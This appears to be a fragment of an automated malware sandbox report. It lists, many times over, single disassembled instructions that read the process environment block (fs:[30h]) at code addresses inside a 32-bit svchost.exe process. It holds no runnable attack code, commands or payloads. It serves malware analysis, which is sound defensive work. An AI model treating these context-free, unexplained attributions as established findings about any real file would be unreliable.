Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D437C mov eax, dword ptr fs:[00000030h]	1_2_031D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320634F mov eax, dword ptr fs:[00000030h]	1_2_0320634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]	1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]	1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]	1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]	1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]	1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]	1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]	1_2_0315438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]	1_2_0315438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]	1_2_031D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]	1_2_031D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EC3CD mov eax, dword ptr fs:[00000030h]	1_2_031EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B63C0 mov eax, dword ptr fs:[00000030h]	1_2_031B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031663FF mov eax, dword ptr fs:[00000030h]	1_2_031663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312823B mov eax, dword ptr fs:[00000030h]	1_2_0312823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A250 mov eax, dword ptr fs:[00000030h]	1_2_0312A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136259 mov eax, dword ptr fs:[00000030h]	1_2_03136259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]	1_2_031EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]	1_2_031EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B8243 mov eax, dword ptr fs:[00000030h]	1_2_031B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B8243 mov ecx, dword ptr fs:[00000030h]	1_2_031B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]	1_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]	1_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]	1_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312826B mov eax, dword ptr fs:[00000030h]	1_2_0312826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320625D mov eax, dword ptr fs:[00000030h]	1_2_0320625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]	1_2_0316E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]	1_2_0316E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]	1_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]	1_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]	1_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]	1_2_031402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]	1_2_031402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]	1_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]	1_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]	1_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032062D6 mov eax, dword ptr fs:[00000030h]	1_2_032062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov ecx, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F0115 mov eax, dword ptr fs:[00000030h]	1_2_031F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160124 mov eax, dword ptr fs:[00000030h]	1_2_03160124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C156 mov eax, dword ptr fs:[00000030h]	1_2_0312C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C8158 mov eax, dword ptr fs:[00000030h]	1_2_031C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]	1_2_03204164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]	1_2_03204164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]	1_2_03136154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]	1_2_03136154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov ecx, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]	1_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]	1_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]	1_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]	1_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]	1_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03170185 mov eax, dword ptr fs:[00000030h]	1_2_03170185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]	1_2_031EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]	1_2_031EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]	1_2_031D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]	1_2_031D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032061E5 mov eax, dword ptr fs:[00000030h]	1_2_032061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]	1_2_031F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]	1_2_031F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031601F8 mov eax, dword ptr fs:[00000030h]	1_2_031601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]	1_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B4000 mov ecx, dword ptr fs:[00000030h]	1_2_031B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6030 mov eax, dword ptr fs:[00000030h]	1_2_031C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A020 mov eax, dword ptr fs:[00000030h]	1_2_0312A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C020 mov eax, dword ptr fs:[00000030h]	1_2_0312C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132050 mov eax, dword ptr fs:[00000030h]	1_2_03132050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6050 mov eax, dword ptr fs:[00000030h]	1_2_031B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315C073 mov eax, dword ptr fs:[00000030h]	1_2_0315C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313208A mov eax, dword ptr fs:[00000030h]	1_2_0313208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F60B8 mov eax, dword ptr fs:[00000030h]	1_2_031F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_031F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031280A0 mov eax, dword ptr fs:[00000030h]	1_2_031280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C80A8 mov eax, dword ptr fs:[00000030h]	1_2_031C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B20DE mov eax, dword ptr fs:[00000030h]	1_2_031B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0312C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031720F0 mov ecx, dword ptr fs:[00000030h]	1_2_031720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0312A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031380E9 mov eax, dword ptr fs:[00000030h]	1_2_031380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B60E0 mov eax, dword ptr fs:[00000030h]	1_2_031B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130710 mov eax, dword ptr fs:[00000030h]	1_2_03130710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160710 mov eax, dword ptr fs:[00000030h]	1_2_03160710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C700 mov eax, dword ptr fs:[00000030h]	1_2_0316C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]	1_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316273C mov ecx, dword ptr fs:[00000030h]	1_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]	1_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AC730 mov eax, dword ptr fs:[00000030h]	1_2_031AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]	1_2_0316C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]	1_2_0316C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130750 mov eax, dword ptr fs:[00000030h]	1_2_03130750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BE75D mov eax, dword ptr fs:[00000030h]	1_2_031BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]	1_2_03172750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]	1_2_03172750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B4755 mov eax, dword ptr fs:[00000030h]	1_2_031B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316674D mov esi, dword ptr fs:[00000030h]	1_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]	1_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]	1_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138770 mov eax, dword ptr fs:[00000030h]	1_2_03138770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D678E mov eax, dword ptr fs:[00000030h]	1_2_031D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031307AF mov eax, dword ptr fs:[00000030h]	1_2_031307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E47A0 mov eax, dword ptr fs:[00000030h]	1_2_031E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0313C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B07C3 mov eax, dword ptr fs:[00000030h]	1_2_031B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]	1_2_031347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]	1_2_031347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]	1_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]	1_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]	1_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_031BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172619 mov eax, dword ptr fs:[00000030h]	1_2_03172619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE609 mov eax, dword ptr fs:[00000030h]	1_2_031AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E627 mov eax, dword ptr fs:[00000030h]	1_2_0314E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03166620 mov eax, dword ptr fs:[00000030h]	1_2_03166620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168620 mov eax, dword ptr fs:[00000030h]	1_2_03168620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313262C mov eax, dword ptr fs:[00000030h]	1_2_0313262C
